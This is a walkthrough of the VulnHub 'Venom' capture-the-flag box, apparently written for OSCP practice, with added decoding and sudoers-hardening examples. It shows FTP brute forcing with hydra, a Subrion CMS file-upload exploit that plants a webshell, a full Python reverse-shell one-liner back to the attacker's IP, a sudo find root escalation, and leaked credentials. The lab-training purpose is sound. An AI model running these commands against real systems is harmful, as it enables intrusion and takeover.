About the Machine
Description:
This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key.
Vulnhub Page:
https://www.vulnhub.com/entry/venom-1,701/
Download Page:
https://download.vulnhub.com/venom/venom.zip
Walkthrough
Let's start by identifying the machine.
┌──(root💀kali)-[~]
└─# arp-scan -l | grep "Systemtechnik"
192.168.101.26 08:00:27:60:99:87 PCS Systemtechnik GmbH
┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.101.24 netmask 255.255.255.0 broadcast 192.168.101.255
inet6 fe80::a00:27ff:fe8b:5efb prefixlen 64 scopeid 0x20<link>
ether 08:00:27:8b:5e:fb txqueuelen 1000 (Ethernet)
RX packets 114813 bytes 7942166 (7.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45989 bytes 2803643 (2.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Let's continue with an nmap scan.
[*] Scan: 513
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 15:38 EDT
Nmap scan report for venom.box (192.168.101.26)
Host is up (0.00029s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Subrion CMS - Open Source Content Management System
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home :: Powered by Subrion 4.2
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/https Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:60:99:87 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: VENOM; OS: Unix
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s
|_nbstat: NetBIOS name: VENOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: venom
| NetBIOS computer name: VENOM\x00
| Domain name: \x00
| FQDN: venom
|_ System time: 2021-07-07T01:09:07+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-06T19:39:07
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms venom.box (192.168.101.26)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.50 seconds
I ran enum4linux against SMB and picked up two users. I then launched a brute-force attack against FTP and SMB with these users, but got no result. The relevant part of the enum4linux output is below.
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.101.26 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nathan (Local User)
S-1-22-1-1002 Unix User\hostinger (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
Nikto and gobuster gave me nothing. However, in the source of the default Apache page I found an MD5 hash in a comment. I cracked it online.
5f2a66f947fa5690c26506f66bde5c23:hostinger
Thinking it might be a password, I fed it to hydra and managed to crack the FTP account.
┌──(root💀kali)-[~/oscp/venom]
└─# hydra -L users -P hash ftp://192.168.101.26
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 13:09:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5/p:6), ~2 tries per task
[DATA] attacking ftp://192.168.101.26:21/
[21][ftp] host: 192.168.101.26 login: hostinger password: hostinger
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 13:09:37
With that I connected over FTP and found a file.
┌──(root💀kali)-[~/oscp/venom]
└─# ftp 192.168.101.26
Connected to 192.168.101.26.
220 (vsFTPd 3.0.3)
Name (192.168.101.26:kali): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 21 23:43 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> pwd
257 "/files" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hint.txt (384 bytes).
226 Transfer complete.
┌──(root💀kali)-[~/oscp/venom]
└─# cat hint.txt
Hey there...
T0D0 --
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password
Have fun .. :)
After base64-decoding the value WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= 4 times we arrive at the phrase standard vigenere cipher.
After base64-decoding aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= once we get https://cryptii.com/pipes/vigenere-cipher. I went to that page and ran the decode with the key hostinger. The result I obtained: E7r9t8@Q#h%Hy+M1234
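The same two steps in code, as an added example that is not part of the original walkthrough: peel the nested base64 layers until the result is no longer base64, then apply the letters-only Vigenère variant that cryptii uses (digits and symbols are left alone and do not advance the key, case is preserved). The inputs are the values from hint.txt above.

```python
import base64
import binascii

# Inputs copied from the hint.txt found on the box.
NESTED_B64 = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
CIPHERTEXT = "L7f9l8@J#p%Ue+Q1234"
KEY = "hostinger"


def peel_base64(blob: str) -> str:
    """Base64-decode repeatedly until the result no longer parses as base64
    (validate=True rejects any character outside the base64 alphabet)."""
    current = blob
    while True:
        try:
            decoded = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return current
        if not decoded.isprintable():
            return current  # binary payload: stop before mangling it
        current = decoded


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Letters-only Vigenere: non-letters pass through unchanged and do not
    consume a key letter; the case of each letter is preserved."""
    shifts = [ord(c) - ord("a") for c in key.lower() if c.isalpha()]
    out, i = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shifts[i % len(shifts)]) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(peel_base64(NESTED_B64))            # standard vigenere cipher
    print(vigenere_decrypt(CIPHERTEXT, KEY))  # E7r9t8@Q#h%Hy+M1234
```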
After a long investigation I realised that, at first, I couldn't use this password anywhere. Then I went back to the note: try on venom.box. After adding it to /etc/hosts I came across a CMS. We can log in to this CMS with the credentials dora:E7r9t8@Q#h%Hy+M1234. Once inside I changed dora's password to test.
I had the CMS version information, so I searched for it in searchsploit.
┌──(root💀kali)-[~/oscp/venom]
└─# searchsploit Subrion CMS 4.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) | php/webapps/49876.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root💀kali)-[~/oscp/venom]
└─# python3 49876.py -u http://venom.box/panel/ -l dora -p test
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://venom.box/panel/
[+] Success!
[+] Got CSRF token: I1fcCoH4sE8QxkwA27KKirM7IN6gfLiPiV3Y9bxh
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: jabtmcowewjzpcu
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://venom.box/panel/uploads/jabtmcowewjzpcu.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
Reading the code really matters: for a long time I tried running the exploit without a trailing slash on the URL, but once I read the code I realised I had to add it myself. We're in now. For a more usable shell I spawned a Python reverse shell back to my machine.
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.24",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
We had already cracked the hostinger user's FTP account, so I switched to the hostinger account. It wasn't much use, but I found the MySQL credentials.
hostinger@venom:/var/www/html/subrion/includes$ cat config.inc.php
cat config.inc.php
<?php
/*
* Subrion Open Source CMS 4.2.1
* Config file generated on 20 May 2021 06:08:00
*/
define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'eddie');
define('INTELLI_DBPASS', 'v3n0mm0n3v');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');
define('IA_SALT', '#5A7C224B51');
// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);
MariaDB [subrion]> select username, password, fullname from sbr421_members;
select username, password, fullname from sbr421_members;
+------------+--------------------------------------------------------------+---------------+
| username | password | fullname |
+------------+--------------------------------------------------------------+---------------+
| dora | $2y$10$OKmYFixqCDv75JOAcrkC2Oqq1wZLzg3R1s1GeD88FZlAI8rRz4TJK | Administrator |
| tester | $2y$10$l6KUEFw/OR9gSmuW3Cb.k.RhbwHPNXJzwfNHo/MUjHDJsPkspRPHC | testtester |
| Tester@123 | $2y$10$WUnG9ihuoCtBj8ZtTKIJd.t.CI6AKk1OMyCb/Yin9VwiC24E1gqIS | Testertest |
+------------+--------------------------------------------------------------+---------------+
While searching around, I found the nathan user's password on the box.
hostinger@venom:/var/www/html/subrion/backup$ ls
ls
total 12
drwxr-xr-x 2 www-data www-data 4096 May 21 16:53 .
drwxr-xr-x 13 www-data www-data 4096 May 21 23:42 ..
-rwxr-xr-x 1 www-data www-data 81 May 21 16:53 .htaccess
hostinger@venom:/var/www/html/subrion/backup$ cat .h
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
hostinger@venom:/var/www/html/subrion/backup$ su nathan
su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
nathan@venom:/var/www/html/subrion/backup$ whoami
whoami
nathan
The rest was extremely easy.
nathan@venom:~$ sudo -l
sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
Matching Defaults entries for nathan on venom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nathan may run the following commands on venom:
(root) ALL, !/bin/su
(root) ALL, !/bin/su
A silly security measure...
nathan@venom:~$ sudo find . -exec /bin/sh \; -quit
sudo find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.txt snap
# cat root.txt
cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.
#
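For comparison, here is the rule from this box beside the kind of rule that would actually have held, as an added sudoers fragment that is not from the original walkthrough. sudoers(5) itself documents that "!" exclusions are generally ineffective, because any allowed command that can spawn a shell (find, vim, less and so on) or a copied and renamed binary sidesteps the exclusion; the only durable fix is an allowlist of the exact commands the user needs. The apache2 restart command is a hypothetical placeholder for whatever the host really requires.

```text
# Weak (what sudo -l showed on venom): root for everything except /bin/su.
# The exclusion is cosmetic; sudo find ... -exec /bin/sh \; still gives root.
nathan  ALL=(root) ALL, !/bin/su

# Stronger: name only the commands that are needed, with full paths, and
# nothing that can page, edit or execute arbitrary files.
# (hypothetical command; replace with what the host actually needs)
nathan  ALL=(root) /usr/bin/systemctl restart apache2
```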
Simple machine.